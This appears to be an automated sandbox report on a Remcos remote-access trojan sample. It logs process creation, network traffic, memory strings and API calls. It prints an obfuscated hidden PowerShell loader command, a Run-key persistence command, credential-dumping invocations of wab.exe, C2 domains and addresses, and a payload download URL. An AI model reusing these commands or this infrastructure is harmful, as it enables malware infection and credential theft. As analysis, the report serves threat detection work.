Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\skabiose\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\

              Networking

Source: Traffic | Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49738 -> 193.222.96.21:29871
Source: Traffic | Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 193.222.96.21:29871 -> 192.168.2.4:49738
Source: Malware configuration extractor | URLs: learfo55ozj01.duckdns.org
Source: global traffic | TCP traffic: 193.222.96.21 ports 29871,1,2,7,8,9
Source: unknown | DNS query: name: learfo55ozj01.duckdns.org
Source: global traffic | TCP traffic: 192.168.2.4:49738 -> 193.222.96.21:29871
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1, Host: geoplugin.net, Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | IP Address: 193.222.96.21
Source: Joe Sandbox View | ASN Name: SWISSCOM Swisscom Switzerland Ltd CH
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /PIoDroeALMbPB243.bin HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, Host: ricohltd.top, Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 occurrences)
Source: wab.exe, 00000007.00000002.2954637411.00000000255E0000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
Source: wab.exe | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
Source: wab.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 00000007.00000002.2955047654.0000000025DC0000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 00000007.00000002.2955047654.0000000025DC0000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: ricohltd.top
Source: wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/
Source: wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmp | Strings found in binary or memory: http://geoplugin.net/json.gp09, http://geoplugin.net/json.gpE, http://geoplugin.net/json.gpd, http://geoplugin.net/json.gpg, http://geoplugin.net/json.gpi, http://geoplugin.net/json.gpr, http://geoplugin.net/json.gpz (the trailing character is neighbouring memory, not part of the URL)
Source: z14Novospedidosdecompra_Profil_4903.exe, 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp, z14Novospedidosdecompra_Profil_4903.exe, 00000000.00000000.1666780592.000000000040A000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2394581791.00000000051B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2394581791.0000000005061000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2394581791.00000000051B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe | String found in binary or memory: http://www.ebuddy.com
Source: wab.exe | String found in binary or memory: http://www.imvu.com
Source: wab.exe, 00000007.00000002.2954637411.00000000255E0000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 00000007.00000002.2954637411.00000000255E0000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
Source: wab.exe | String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000001.00000002.2394581791.0000000005061000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2394581791.00000000051B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: wab.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe, 00000007.00000002.2939812066.00000000096F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ricohltd.top/
Source: wab.exe, 00000007.00000002.2939812066.00000000096F8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939812066.00000000096BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ricohltd.top/PIoDroeALMbPB243.bin
Source: wab.exe, 00000007.00000002.2939812066.00000000096BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ricohltd.top/PIoDroeALMbPB243.binB
Source: wab.exe, 00000007.00000002.2939812066.00000000096BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ricohltd.top/PIoDroeALMbPB243.binn
Source: wab.exe | String found in binary or memory: https://www.google.com
Source: wab.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | HTTPS traffic detected: 104.21.60.38:443 -> 192.168.2.4:49737 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Code function: 0_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard

              E-Banking Fraud

              Source: Yara match | File source: 00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000003.2443472067.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.2939981416.000000000971F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000003.2417578332.000000000971A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 7812, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED

              System Summary

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00401806 NtdllDefWindowProc_W
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_004018C0 NtdllDefWindowProc_W
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_004016FD NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_004017B7 NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00402CAC NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00402D66 NtdllDefWindowProc_A
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | File created: C:\Windows\resources\0809
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Code function: 0_2_00407040
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Code function: 0_2_00406869
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Code function: 0_2_00404B2B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04F4EFF8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04F4F8C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04F4ECB0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_0041208C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_0043C13A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_00449300
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_0040D322
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_0044A4F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_0043A5AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_00413631
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_00446690
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_0044A730
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_004398D8
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_004498E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_0044A886
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_0043DA09
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_00438D5E
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_00449ED0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_0041FE83
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_00430F54
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00416760 appears 69 times
              Source: z14Novospedidosdecompra_Profil_4903.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: z14Novospedidosdecompra_Profil_4903.exe.1.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: z14Novospedidosdecompra_Profil_4903.exe, 00000000.00000000.1666816620.0000000000454000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamestade.exeDVarFileInfo$ vs z14Novospedidosdecompra_Profil_4903.exe
              Source: z14Novospedidosdecompra_Profil_4903.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"
              Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@21/15@3/3
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Code function: 0_2_004045AF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,FindCloseChangeNotification
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Code function: 0_2_00402095 CoCreateInstance
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | File created: C:\Users\user\AppData\Roaming\skabiose
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: \Sessions\1\BaseNamedObjects\alpwovnb-G3F5OR
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | File created: C:\Users\user\AppData\Local\Temp\nsm3F58.tmp
              Source: z14Novospedidosdecompra_Profil_4903.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System information queried: HandleInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: wab.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000007.00000002.2955047654.0000000025DC0000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: z14Novospedidosdecompra_Profil_4903.exe | ReversingLabs: Detection: 57%
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | File read: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-32948
              Source: unknown | Process created: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hdqrgswaarisauuvaipksos"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jfwcglgtwzafkaizktcddtnovi"
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: dwmapi.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: oleacc.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: shfolder.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: riched20.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: usp10.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: msls31.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: textinputframework.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: coreuicomponents.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: ntmarta.dll
